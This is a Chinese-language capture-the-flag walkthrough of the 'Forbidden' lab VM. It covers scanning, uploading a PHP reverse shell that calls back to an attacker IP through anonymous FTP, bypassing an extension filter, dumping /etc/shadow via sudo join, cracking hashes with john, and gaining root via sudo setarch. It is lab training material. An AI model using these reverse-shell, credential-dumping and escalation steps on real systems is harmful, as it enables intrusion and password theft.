Forbidden

Forbidden

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/Forbidden]
└─$ rustscan -a $IP -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.162:80
Open 192.168.0.162:21

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.0.143
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Oct 09  2020 www [NSE: writeable]
80/tcp open  http    syn-ack nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD
Service Info: OS: Unix

目录爆破

┌──(kali💀kali)-[~/temp/Forbidden]
└─$ gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,bak,jpg,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.162/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,bak,jpg,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 241]
/robots.txt           (Status: 200) [Size: 10]
/note.txt             (Status: 200) [Size: 75]
Progress: 381267 / 1323366 (28.81%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 381476 / 1323366 (28.83%)
===============================================================
Finished
===============================================================

漏洞发现

踩点

http://192.168.0.162/

SECURE WEB/FTP
Hi, Im the best admin of the world. You cannot execute .php code on this server so you cannot obtain a reverse shell. Not sure if its misconfigured another things... but the importart is that php is disabled. -marta

得到一个用户名marta，他说php是难以执行的

敏感目录

http://192.168.0.162/robots.txt
/note.txt

http://192.168.0.162/note.txt
The extra-secured .jpg file contains my password but nobody can obtain it.

敏感端口

开启了 21 端口 ftp 服务，尝试查看有无隐藏信息，以及尝试上传反弹 shell：

┌──(kali💀kali)-[~/temp/Forbidden]
└─$ vim revshell.phtml   

┌──(kali💀kali)-[~/temp/Forbidden]
└─$ head revshell.phtml                                          

  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '192.168.0.143';  // You have changed this
  $port = 1234;  // And this
  $chunk_size = 1400;

┌──(kali💀kali)-[~/temp/Forbidden]
└─$ file revshell.phtml                                                                                                              
revshell.phtml: ASCII text

然后尝试上传：

┌──(kali💀kali)-[~/temp/Forbidden]
└─$ ftp $IP                                                                                                                          
Connected to 192.168.0.162.
220 (vsFTPd 3.0.3)
Name (192.168.0.162:kali): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||5129|)
150 Here comes the directory listing.
drwxr-xr-x    3 0        113          4096 Oct 09  2020 .
drwxr-xr-x    3 0        113          4096 Oct 09  2020 ..
drwxrwxrwx    2 0        0            4096 Oct 09  2020 www
226 Directory send OK.
ftp> cd www
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||16109|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Oct 09  2020 .
drwxr-xr-x    3 0        113          4096 Oct 09  2020 ..
-rwxrwxrwx    1 0        0             241 Oct 09  2020 index.html
-rwxrwxrwx    1 0        0              75 Oct 09  2020 note.txt
-rwxrwxrwx    1 0        0              10 Oct 09  2020 robots.txt
226 Directory send OK.
ftp> put revshell.phtml 
local: revshell.phtml remote: revshell.phtml
229 Entering Extended Passive Mode (|||38821|)
150 Ok to send data.
100% |******************************************************************************************************|  3911        5.45 MiB/s    00:00 ETA
226 Transfer complete.
3911 bytes sent in 00:00 (458.99 KiB/s)
ftp> exit
221 Goodbye.

访问尝试连接，发现连不上，试试是不是封锁的很完整：

Php|php2|php3|php4|php5|php6|php7|pht|phtm|phtml

当我访问：http://192.168.0.162/1.php5 时成功了！

提权

信息搜集

(remote) www-data@forbidden:/$ cd ~
(remote) www-data@forbidden:/var/www$ cd html
(remote) www-data@forbidden:/var/www/html$ ls -la
total 48
drwxr-xr-x 2 root     root      4096 Oct  9  2020 .
drwxr-xr-x 3 root     root      4096 Oct  9  2020 ..
-rwxrwxrwx 1 www-data www-data 33469 Oct  9  2020 TOPSECRETIMAGE.jpg
-rw-r--r-- 1 root     root       612 Oct  9  2020 index.nginx-debian.html
(remote) www-data@forbidden:/var/www/html$ cat index.nginx-debian.html 
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>

(remote) www-data@forbidden:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
marta:x:1000:1000:marta,,,:/home/marta:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ftp:x:105:113:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
markos:x:1001:1001:,,,:/home/markos:/bin/bash
peter:x:1002:1002:,,,:/home/peter:/bin/bash
(remote) www-data@forbidden:/$ find / -perm -u=s -type f 2>/dev/null
/home/marta/.forbidden
/usr/bin/mount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/su
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/passwd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
(remote) www-data@forbidden:/$ ls -la /home/marta/.forbidden
-rwsr-sr-x 1 root marta 16712 Oct  9  2020 /home/marta/.forbidden
(remote) www-data@forbidden:/$ file /home/marta/.forbidden
/home/marta/.forbidden: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=2bfa60b6faf88c21128b04f602804f0b042d8e84, not stripped

照片藏密码

找到了前面一开始说的图片以及一个奇怪的程序，下载到本地看看：

本地看一下有无隐藏信息：

hgbe02@pwn:/mnt/c/Users/Administrator/Desktop$ exiftool TOPSECRETIMAGE.jpg
ExifTool Version Number         : 12.40
File Name                       : TOPSECRETIMAGE.jpg
Directory                       : .
File Size                       : 33 KiB
File Modification Date/Time     : 2020:10:10 01:04:22+08:00
File Access Date/Time           : 2024:07:09 16:45:21+08:00
File Inode Change Date/Time     : 2024:07:09 16:45:08+08:00
File Permissions                : -rwxrwxrwx
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 324
Image Height                    : 216
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 324x216
Megapixels                      : 0.070

hgbe02@pwn:/mnt/c/Users/Administrator/Desktop$ binwalk TOPSECRETIMAGE.jpg

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

他说密码在里面的，尝试一下名字，带不带.jpg的都试试：

join读取文件

marta@forbidden:/var/www/html$ cd ~
marta@forbidden:~$ ls -la
total 52
drwxr-xr-x 3 marta marta  4096 Oct  9  2020 .
drwxr-xr-x 5 root  root   4096 Oct  9  2020 ..
-rw-r--r-- 1 marta marta   220 Oct  9  2020 .bash_logout
-rw-r--r-- 1 marta marta  3526 Oct  9  2020 .bashrc
-rwsr-sr-x 1 root  marta 16712 Oct  9  2020 .forbidden
-rw-r--r-- 1 root  root    130 Oct  9  2020 hidden.c
drwxr-xr-x 3 marta marta  4096 Oct  9  2020 .local
-rw-r--r-- 1 marta marta   807 Oct  9  2020 .profile
-rw------- 1 marta marta    55 Oct  9  2020 .Xauthority
marta@forbidden:~$ sudo -l
Matching Defaults entries for marta on forbidden:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marta may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/join

尝试合并/etc/shadow查看密码：

marta@forbidden:~$ /usr/bin/join --help
Usage: /usr/bin/join [OPTION]... FILE1 FILE2
For each pair of input lines with identical join fields, write a line to
standard output.  The default join field is the first, delimited by blanks.

When FILE1 or FILE2 (not both) is -, read standard input.

  -a FILENUM        also print unpairable lines from file FILENUM, where
                      FILENUM is 1 or 2, corresponding to FILE1 or FILE2
  -e EMPTY          replace missing input fields with EMPTY
  -i, --ignore-case  ignore differences in case when comparing fields
  -j FIELD          equivalent to '-1 FIELD -2 FIELD'
  -o FORMAT         obey FORMAT while constructing output line
  -t CHAR           use CHAR as input and output field separator
  -v FILENUM        like -a FILENUM, but suppress joined output lines
  -1 FIELD          join on this FIELD of file 1
  -2 FIELD          join on this FIELD of file 2
  --check-order     check that the input is correctly sorted, even
                      if all input lines are pairable
  --nocheck-order   do not check that the input is correctly sorted
  --header          treat the first line in each file as field headers,
                      print them without trying to pair them
  -z, --zero-terminated     line delimiter is NUL, not newline
      --help     display this help and exit
      --version  output version information and exit

Unless -t CHAR is given, leading blanks separate fields and are ignored,
else fields are separated by CHAR.  Any FIELD is a field number counted
from 1.  FORMAT is one or more comma or blank separated specifications,
each being 'FILENUM.FIELD' or '0'.  Default FORMAT outputs the join field,
the remaining fields from FILE1, the remaining fields from FILE2, all
separated by CHAR.  If FORMAT is the keyword 'auto', then the first
line of each file determines the number of fields output for each line.

Important: FILE1 and FILE2 must be sorted on the join fields.
E.g., use "sort -k 1b,1" if 'join' has no options,
or use "join -t ''" if 'sort' has no options.
Note, comparisons honor the rules specified by 'LC_COLLATE'.
If the input is not sorted and some lines cannot be joined, a
warning message will be given.

GNU coreutils online help: <https://www.gnu.org/software/coreutils/>
Full documentation at: <https://www.gnu.org/software/coreutils/join>
or available locally via: info '(coreutils) join invocation'

对它自己本身进行合并，并输出所有不匹配行：

marta@forbidden:~$ sudo join /etc/shadow /etc/shadow
root:$6$8nU2FdqnxRtT9mWF$9q7El.D7BDrlzNyYYPNqjTcwsQEsC7utrzszLgbe9V.3KqYSfx2XgqjIEeToP41TJTiZQOGVsdCzIAYHw5O.51:18544:0:99999:7:::
daemon:*:18544:0:99999:7:::
bin:*:18544:0:99999:7:::
sys:*:18544:0:99999:7:::
sync:*:18544:0:99999:7:::
games:*:18544:0:99999:7:::
man:*:18544:0:99999:7:::
lp:*:18544:0:99999:7:::
mail:*:18544:0:99999:7:::
news:*:18544:0:99999:7:::
uucp:*:18544:0:99999:7:::
proxy:*:18544:0:99999:7:::
www-data:*:18544:0:99999:7:::
backup:*:18544:0:99999:7:::
list:*:18544:0:99999:7:::
irc:*:18544:0:99999:7:::
gnats:*:18544:0:99999:7:::
nobody:*:18544:0:99999:7:::
_apt:*:18544:0:99999:7:::
systemd-timesync:*:18544:0:99999:7:::
systemd-network:*:18544:0:99999:7:::
systemd-resolve:*:18544:0:99999:7:::
messagebus:*:18544:0:99999:7:::
marta:$6$h.4ZF5esZ/N1OIcu$8vL1D3iM6iuhniSG8nIz0582atbIV6y/UBl0eks1.Wrd51BqLK8Wqt91WXg0Y2mrdNY4luPQkqUWXFXWxLVwe/:18544:0:99999:7:::
systemd-coredump:!!:18544::::::
ftp:*:18544:0:99999:7:::
sshd:*:18544:0:99999:7:::
markos:$6$PTerrFpyfOmkM5Xi$oo8gNZyyxsZbKhOIXrm2w/x.Xvhdr7Ny/4JgLDRLRAxAwEwGtH2kD7PjzeloAstqCPq/KKrqrPioMM8vwWbqZ.:18544:0:99999:7:::
peter:$6$QAeWH9Et9PAJdYz/$/4VhburW9KoVTRY1Ry63wNEfr4rxwQGaRJ3kKW2nEAk0LcqjqZjy/m5rtaCi3VebNu7AaGFhQT4FBgbQVIyq81:18544:0:99999:7:::

或者参考 https://gtfobins.github.io/gtfobins/join/#sudo

marta@forbidden:~$ sudo join -a 2 /dev/null /etc/shadow
root:$6$8nU2FdqnxRtT9mWF$9q7El.D7BDrlzNyYYPNqjTcwsQEsC7utrzszLgbe9V.3KqYSfx2XgqjIEeToP41TJTiZQOGVsdCzIAYHw5O.51:18544:0:99999:7:::
daemon:*:18544:0:99999:7:::
bin:*:18544:0:99999:7:::
sys:*:18544:0:99999:7:::
sync:*:18544:0:99999:7:::
games:*:18544:0:99999:7:::
man:*:18544:0:99999:7:::
lp:*:18544:0:99999:7:::
mail:*:18544:0:99999:7:::
news:*:18544:0:99999:7:::
uucp:*:18544:0:99999:7:::
proxy:*:18544:0:99999:7:::
www-data:*:18544:0:99999:7:::
backup:*:18544:0:99999:7:::
list:*:18544:0:99999:7:::
irc:*:18544:0:99999:7:::
gnats:*:18544:0:99999:7:::
nobody:*:18544:0:99999:7:::
_apt:*:18544:0:99999:7:::
systemd-timesync:*:18544:0:99999:7:::
systemd-network:*:18544:0:99999:7:::
systemd-resolve:*:18544:0:99999:7:::
messagebus:*:18544:0:99999:7:::
marta:$6$h.4ZF5esZ/N1OIcu$8vL1D3iM6iuhniSG8nIz0582atbIV6y/UBl0eks1.Wrd51BqLK8Wqt91WXg0Y2mrdNY4luPQkqUWXFXWxLVwe/:18544:0:99999:7:::
systemd-coredump:!!:18544::::::
ftp:*:18544:0:99999:7:::
sshd:*:18544:0:99999:7:::
markos:$6$PTerrFpyfOmkM5Xi$oo8gNZyyxsZbKhOIXrm2w/x.Xvhdr7Ny/4JgLDRLRAxAwEwGtH2kD7PjzeloAstqCPq/KKrqrPioMM8vwWbqZ.:18544:0:99999:7:::
peter:$6$QAeWH9Et9PAJdYz/$/4VhburW9KoVTRY1Ry63wNEfr4rxwQGaRJ3kKW2nEAk0LcqjqZjy/m5rtaCi3VebNu7AaGFhQT4FBgbQVIyq81:18544:0:99999:7:::

这里实际上直接读取rootflag也是可以的，但是我们想拿到shell，所以接着做！拿到本地尝试破译：

┌──(kali💀kali)-[~/temp/Forbidden]
└─$ cat hash                                                           
markos:$6$PTerrFpyfOmkM5Xi$oo8gNZyyxsZbKhOIXrm2w/x.Xvhdr7Ny/4JgLDRLRAxAwEwGtH2kD7PjzeloAstqCPq/KKrqrPioMM8vwWbqZ.:18544:0:99999:7:::
peter:$6$QAeWH9Et9PAJdYz/$/4VhburW9KoVTRY1Ry63wNEfr4rxwQGaRJ3kKW2nEAk0LcqjqZjy/m5rtaCi3VebNu7AaGFhQT4FBgbQVIyq81:18544:0:99999:7:::
marta:$6$h.4ZF5esZ/N1OIcu$8vL1D3iM6iuhniSG8nIz0582atbIV6y/UBl0eks1.Wrd51BqLK8Wqt91WXg0Y2mrdNY4luPQkqUWXFXWxLVwe/:18544:0:99999:7:::
root:$6$8nU2FdqnxRtT9mWF$9q7El.D7BDrlzNyYYPNqjTcwsQEsC7utrzszLgbe9V.3KqYSfx2XgqjIEeToP41TJTiZQOGVsdCzIAYHw5O.51:18544:0:99999:7:::

┌──(kali💀kali)-[~/temp/Forbidden]
└─$ john hash                                            
Using default input encoding: UTF-8
Loaded 4 password hashes with 4 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 SSE2 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
boomer           (peter)     
1g 0:00:02:33 34.25% 2/3 (ETA: 05:10:59) 0.006493g/s 447.2p/s 1186c/s 1186C/s noway0..smitty0
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

serarch提权

peter@forbidden:~$ ls -la
total 24
drwxr-xr-x 2 peter peter 4096 Oct  9  2020 .
drwxr-xr-x 5 root  root  4096 Oct  9  2020 ..
-rw------- 1 peter peter   12 Oct  9  2020 .bash_history
-rw-r--r-- 1 peter peter  220 Oct  9  2020 .bash_logout
-rw-r--r-- 1 peter peter 3526 Oct  9  2020 .bashrc
-rw-r--r-- 1 peter peter  807 Oct  9  2020 .profile
peter@forbidden:~$ sudo -l
Matching Defaults entries for peter on forbidden:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on forbidden:
    (ALL : ALL) NOPASSWD: /usr/bin/setarch

可以参考：https://gtfobins.github.io/gtfobins/setarch/

peter@forbidden:~$ echo $arch

peter@forbidden:~$ uname -a
Linux forbidden 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
peter@forbidden:~$ sudo setarch x86_64 /bin/bash
root@forbidden:/home/peter# cd ~
root@forbidden:~# ls -la
total 24
drwx------  3 root root 4096 Oct  9  2020 .
drwxr-xr-x 18 root root 4096 Oct  9  2020 ..
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4096 Oct  9  2020 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   16 Oct  9  2020 root.txt
root@forbidden:~# cat root.txt 
xxxxxxx
root@forbidden:~# find / -name user.txt 2>/dev/null
/home/markos/user.txt

参考

https://kerszl.github.io/hacking/walkthrough/Forbidden/

https://github.com/cankadioglu/HackMyVM/blob/main/Forbidden

https://kaianperez.github.io/forbidden/#ftp